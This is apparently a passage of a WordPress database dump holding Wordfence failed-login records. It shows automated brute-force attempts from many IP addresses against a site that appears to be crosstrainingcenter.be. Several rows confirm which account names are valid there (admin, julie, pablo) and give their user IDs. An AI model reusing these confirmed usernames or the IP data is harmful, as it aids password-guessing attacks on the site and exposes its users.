(98439, 1491816336.793880, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98440, 1491816337.114106, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98441, 1491816337.437983, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98442, 1491816337.770482, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98443, 1491816338.094193, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98444, 1491816338.413878, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98445, 1491816338.746370, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98446, 1491817613.574369, 1, 'loginFailInvalidUsername', 'test', 0, 1436510797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98447, 1491817614.640082, 1, 'loginFailInvalidUsername', 'test', 0, 1436510797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98448, 1491818371.654386, 1, 'loginFailInvalidUsername', 'test', 0, 2984180062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98449, 1491818373.321628, 1, 'loginFailInvalidUsername', 'test', 0, 2984180062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98450, 1491821325.925346, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98451, 1491821327.708221, 1, 'loginFailInvalidUsername', 'travail', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98452, 1491821329.455323, 1, 'loginFailInvalidUsername', 'namur', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98453, 1491821331.174485, 1, 'loginFailInvalidUsername', 'center', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98454, 1491821332.926006, 1, 'loginFailValidUsername', 'admin', 1, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98455, 1491821334.678101, 1, 'loginFailValidUsername', 'julie', 2, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98456, 1491821336.416725, 1, 'loginFailValidUsername', 'pablo', 3, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98457, 1491821338.150584, 1, 'loginFailInvalidUsername', 'vous', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98458, 1491821339.912152, 1, 'loginFailInvalidUsername', 'training', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98459, 1491821341.828534, 1, 'loginFailInvalidUsername', 'notre', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98460, 1491821910.723298, 1, 'loginFailInvalidUsername', 'test', 0, 774888250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98461, 1491821911.814233, 1, 'loginFailInvalidUsername', 'test', 0, 774888250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98462, 1491822077.188188, 1, 'loginFailInvalidUsername', 'pour', 0, 1388568683, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98463, 1491822078.977389, 1, 'loginFailInvalidUsername', 'cross', 0, 1388568683, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98464, 1491822875.813636, 1, 'loginFailInvalidUsername', 'demo', 0, 2548839248, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98465, 1491823552.235033, 1, 'loginFailInvalidUsername', 'test', 0, 3319534981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(98466, 1491823553.951432, 1, 'loginFailInvalidUsername', 'test', 0, 3319534981, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98467, 1491824604.094737, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98468, 1491824605.923741, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98469, 1491824607.846666, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98470, 1491824609.694658, 1, 'loginFailInvalidUsername', 'demo', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98471, 1491824611.644415, 1, 'loginFailInvalidUsername', 'test', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98472, 1491824613.514269, 1, 'loginFailValidUsername', 'admin', 1, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98473, 1491824615.996992, 1, 'loginFailInvalidUsername', 'test', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98474, 1491824617.844874, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98475, 1491824619.839867, 1, 'loginFailInvalidUsername', 'testuser', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98476, 1491824621.675580, 1, 'loginFailInvalidUsername', 'test123', 0, 2655369265, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98477, 1491825126.876348, 1, 'loginFailInvalidUsername', 'test', 0, 656488519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98478, 1491825128.391210, 1, 'loginFailInvalidUsername', 'test', 0, 656488519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98479, 1491825439.077918, 1, 'loginFailInvalidUsername', 'test', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98480, 1491825440.814309, 1, 'loginFailValidUsername', 'admin', 1, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98481, 1491825442.538215, 1, 'loginFailValidUsername', 'julie', 2, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98482, 1491825444.273797, 1, 'loginFailValidUsername', 'pablo', 3, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98483, 1491825446.026717, 1, 'loginFailInvalidUsername', 'vous', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98484, 1491825447.751750, 1, 'loginFailInvalidUsername', 'training', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98485, 1491825449.469820, 1, 'loginFailInvalidUsername', 'notre', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98486, 1491825451.217301, 1, 'loginFailInvalidUsername', 'pour', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98487, 1491825452.938830, 1, 'loginFailInvalidUsername', 'cross', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98488, 1491825454.806080, 1, 'loginFailInvalidUsername', 'objectifs', 0, 621390095, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98489, 1491825664.827375, 1, 'loginFailInvalidUsername', 'test', 0, 1731788448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98490, 1491825666.121135, 1, 'loginFailInvalidUsername', 'test', 0, 1731788448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98491, 1491825730.968001, 1, 'loginFailInvalidUsername', 'test', 0, 1449385260, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98492, 1491825732.136601, 1, 'loginFailInvalidUsername', 'test', 0, 1449385260, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98493, 1491826301.630635, 1, 'loginFailInvalidUsername', 'venez', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98494, 1491826303.624160, 1, 'loginFailInvalidUsername', 'outils', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98495, 1491826305.630248, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98496, 1491826307.637916, 1, 'loginFailInvalidUsername', 'travail', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98497, 1491826309.666058, 1, 'loginFailInvalidUsername', 'namur', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98498, 1491826311.710839, 1, 'loginFailInvalidUsername', 'center', 0, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98499, 1491826313.717253, 1, 'loginFailValidUsername', 'admin', 1, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98500, 1491826315.687472, 1, 'loginFailValidUsername', 'admin', 1, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98501, 1491826318.047085, 1, 'loginFailValidUsername', 'julie', 2, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98502, 1491826320.114698, 1, 'loginFailValidUsername', 'pablo', 3, 1109509224, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98503, 1491830693.622009, 1, 'loginFailInvalidUsername', 'test', 0, 45319675, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98504, 1491831456.678335, 1, 'loginFailInvalidUsername', 'test', 0, 789153653, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98505, 1491831458.468726, 1, 'loginFailInvalidUsername', 'test', 0, 789153653, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98506, 1491831774.765220, 1, 'loginFailInvalidUsername', 'test', 0, 1431082104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98507, 1491831775.922393, 1, 'loginFailInvalidUsername', 'test', 0, 1431082104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98508, 1491833443.623309, 1, 'loginFailInvalidUsername', 'test', 0, 1741554987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98509, 1491833447.713508, 1, 'loginFailInvalidUsername', 'test', 0, 1741554987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98510, 1491835582.936576, 1, 'loginFailInvalidUsername', 'test', 0, 2548244606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98511, 1491835583.988292, 1, 'loginFailInvalidUsername', 'test', 0, 2548244606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(100211, 1494828574.148057, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100212, 1494828576.138102, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100213, 1494828578.084001, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100214, 1494828580.078801, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100215, 1494828582.057281, 1, 'loginFailInvalidUsername', 'test12345', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99314, 1492882974.428163, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1000782271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99315, 1492882975.977089, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1000782271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99316, 1492883081.352303, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2441469703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99317, 1492883082.419045, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2441469703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99318, 1492883597.635223, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1740883504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99319, 1492883599.011265, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1740883504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99320, 1492891123.226621, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000802564, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99321, 1492891124.297533, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000802564, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99322, 1492893394.512086, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3319547138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99323, 1492893395.959794, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3319547138, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99324, 1492893426.109876, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1592058074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99325, 1492893427.100081, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1592058074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99326, 1492897212.162495, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3000994407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99327, 1492900113.986697, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1868429218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99328, 1492901729.939785, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631815759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99329, 1492901731.531456, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631815759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99330, 1492905634.136431, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1327441816, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99331, 1492906319.906633, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 693760773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99332, 1492906544.814160, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1660897944, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99333, 1492908954.703885, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1589624257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99334, 1492908955.878302, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1589624257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99335, 1492914914.082647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 756559839, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99336, 1492916933.740492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 394065135, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99337, 1492916935.252948, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 394065135, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99338, 1492917246.414143, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 462680889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99339, 1492920440.905783, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3134378555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99340, 1492920442.365342, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3134378555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99341, 1492920461.764571, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1652555154, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99342, 1492923971.238268, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1075856298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99343, 1492926261.891962, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014952872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99344, 1492926263.416846, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014952872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99345, 1492927256.037974, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1535360117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99346, 1492927257.185518, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1535360117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99347, 1492929092.354762, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1480982105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99348, 1492929608.399710, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1464139916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99349, 1492929609.551380, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1464139916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99350, 1492929660.381832, 1, 'loginFailValidUsername', 'julie', 2, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99351, 1492929661.023656, 1, 'loginFailValidUsername', 'julie', 2, 1534660767, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100210, 1494828572.067239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100209, 1494828570.082910, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100208, 1494828568.132256, 1, 'loginFailInvalidUsername', 'crosstrainingcenter.be', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100207, 1494828352.015239, 1, 'loginFailValidUsername', 'admin', 1, 3017001352, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100206, 1494755977.339895, 1, 'loginFailInvalidUsername', 'webadmin', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100205, 1494751507.058810, 1, 'loginFailInvalidUsername', 'webadmin', 0, 778399303, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100204, 1494750687.212359, 1, 'loginFailInvalidUsername', 'testing', 0, 1427222478, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100203, 1494739097.466700, 1, 'loginFailValidUsername', 'julie', 2, 3194516422, 'Mozilla/5.0 (Windows NT 6.0; rv:52.50.07) Gecko/20148160 Firefox/52.50.07'),
(100202, 1494732578.417104, 1, 'loginFailValidUsername', 'julie', 2, 1768542757, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/530.61.18 (KHTML, like Gecko) Chrome/55.1.5974.0601 Safari/532.01 OPR/41.9.4251.9989'),
(100201, 1494726074.968708, 1, 'loginFailValidUsername', 'julie', 2, 703282732, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.18.60 (KHTML, like Gecko) Version/4.6.2 Safari/533.25'),
(100200, 1494719782.280928, 1, 'loginFailValidUsername', 'julie', 2, 2998565647, 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/534.06.53 (KHTML, like Gecko) Chrome/57.4.9570.4208 Safari/534.36'),
(100199, 1494713334.936608, 1, 'loginFailValidUsername', 'admin', 1, 3015568514, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100198, 1494707854.384782, 1, 'loginFailValidUsername', 'julie', 2, 2630446817, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.67.20) Gecko/20179743 Firefox/45.67.20'),
(100197, 1494702022.260101, 1, 'loginFailValidUsername', 'julie', 2, 3524283525, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.84.37 (KHTML, like Gecko) Chrome/56.3.9663.4935 Safari/534.45 OPR/44.5.0486.5658'),
(100196, 1494696184.737164, 1, 'loginFailValidUsername', 'julie', 2, 704210992, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_43_90) AppleWebKit/532.84.31 (KHTML, like Gecko) Chrome/56.3.7226.2954 Safari/533.23 Edge/37.18752'),
(100195, 1494690360.744469, 1, 'loginFailValidUsername', 'julie', 2, 635100517, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.85.38 (KHTML, like Gecko) Chrome/56.4.9703.4075 Safari/534.46 OPR/44.5.0525.5798'),
(100194, 1494684435.421126, 1, 'loginFailInvalidUsername', 'testing', 0, 3590043246, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100193, 1494683876.480671, 1, 'loginFailInvalidUsername', 'testing', 0, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100192, 1494678893.030389, 1, 'loginFailInvalidUsername', 'test1', 0, 1168365674, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100191, 1494678635.563437, 1, 'loginFailValidUsername', 'julie', 2, 1599449979, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.11.64 (KHTML, like Gecko) Version/4.6.1 Safari/533.28'),
(100190, 1494678340.650427, 1, 'loginFailInvalidUsername', 'administrator', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100189, 1494672768.362361, 1, 'loginFailValidUsername', 'julie', 2, 1565895706, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.17.60 (KHTML, like Gecko) Version/4.6.2 Safari/533.25'),
